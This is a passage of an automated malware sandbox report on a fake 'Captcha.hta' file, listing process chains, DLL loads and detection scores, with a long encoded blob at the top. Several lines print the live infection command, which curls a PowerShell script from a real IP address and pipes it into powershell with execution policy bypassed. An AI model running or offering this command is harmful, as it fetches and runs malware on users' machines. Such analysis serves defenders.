QlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
              Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winHTA@14/10@2/2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,8_2_00437DF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mli0y3mh.qvs.ps1Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Captcha.htaVirustotal: Detection: 19%
              Source: Captcha.htaReversingLabs: Detection: 21%
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Captcha.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1090.tmp" "c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1090.tmp" "c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.pdb source: powershell.exe, 00000005.00000002.1737453939.0000000005224000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh8_2_0043D812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00443469 push ebp; iretd 8_2_0044346C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044366E push 9F00CD97h; ret 8_2_004436B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h8_2_0043AE3E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dllJump to dropped file
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
